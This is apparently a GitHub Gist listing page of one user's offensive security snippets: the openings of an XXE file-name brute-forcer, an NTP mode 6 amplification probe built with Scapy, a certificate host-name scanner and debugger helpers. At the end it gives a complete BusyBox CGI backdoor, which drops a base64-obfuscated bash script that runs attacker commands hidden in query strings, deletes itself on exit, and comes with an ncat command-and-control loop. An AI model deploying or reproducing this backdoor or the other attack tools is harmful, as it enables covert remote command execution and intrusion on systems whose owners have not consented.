Skip to content

Instantly share code, notes, and snippets.

@themson
themson / endswap.py
Last active August 29, 2015 14:17
Immunity Debugger Endian Swap PyCommand
"""
Immunity Debugger Endian Swap
themson mester
endianswap.py simple script to swap byte order of addresses
"""
__VERSION__ = '1.1'
import immlib
@themson
themson / xxe_filebrute.sh
Last active August 29, 2015 14:14
Script for brute forcing file names via XML DTD Entities
#!/bin/bash
# script for brute forcing file names via XML DTD Entities
PATH_BASE=$1
FILE_LIST=$2
i=1;
CONCAT_ENT=""
CONCAT_HEAD="<!ENTITY file_list \""
CONCAT_TAIL="\" >"
# CONFIRM CLI ARGUMENT COUNT
@themson
themson / readvar_Mode_6_AMP_test.py
Created November 15, 2014 05:19
readvar_Mode_6_AMP_test
#!/usr/bin/env python
from scapy.all import *
import logging
import sys
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
dest_ip = sys.argv[1]
ntp6_readvar = (IP(dst=dest_ip)/UDP(dport=123)/Raw(load='\x16\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'))
@themson
themson / cert_alt_names.sh
Last active August 29, 2015 14:05
Search for host names in x509 alternate names extension
#!/bin/bash
TARGETS=$1
PORT=$2
OUTLOG=$3
HOSTLOG='https_hosts.log'
if [ "$#" -ne 3 ]; then
echo "Usage: $0 <targets.file> <port> <logfile>";
exit
fi
@themson
themson / python logger.debug() stub
Last active August 29, 2015 14:05
stub for using python logging object
import logging
def toggle_debug(debug_state):
logger = logging.getLogger(__file__)
if debug_state is True:
logger.setLevel(logging.DEBUG)
stream = logging.StreamHandler()
stream.setLevel(logging.NOTSET)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s: "%(message)s"')
@themson
themson / BUSYBOX_CGI_BACKDOOR
Last active July 19, 2017 11:40
CGI Based Backdoor using Busybox httpd applet:
CGI BASED BACKDOOR WITH BUSYBOX:
----------------------------------
mkdir -p /tmp/s/cgi-bin;(base64 -d <<<IyEvYmluL2Jhc2gKaWYgWyAiJFJFUVVFU1RfTUVUSE9EIiA9PSAiSEVBRCIgXSAmJiBbICIkSFRUUF9VU0VSX0FHRU5UIiA9PSAibm9wZSIgXTsgdGhlbgogICAgQz0kKGJhc2U2NCAtZCA8PDwgJFFVRVJZX1NUUklORykKICAgIGlmIFsgIiRDIiA9PSAiZXhpdCIgXTsgdGhlbgogICAgICAgIGVjaG8gIkNsZWFuIgogICAgICAgIHJtIC4vcAogICAgICAgIGtpbGwgJChwZ3JlcCBidXN5Ym94KQogICAgIGZpCiAgICAgZWNobyAkKGJhc2ggLWMgIiRDIikKZmkK)>/tmp/s/cgi-bin/p;chmod +x /tmp/s/cgi-bin/p; busybox httpd -f -p <LPORT> -h /tmp/s/; rm -rf /tmp/s/
C2:
---------------------
COMMAND=''; while [ "$COMMAND" != "exit" ]; do read -p "$ " COMMAND; echo -e "HEAD /cgi-bin/p?$(base64<<<$COMMAND) HTTP/1.0\nHost: \nUser-Agent: nope\n\n" | ncat <LHOST> <LPORT>; done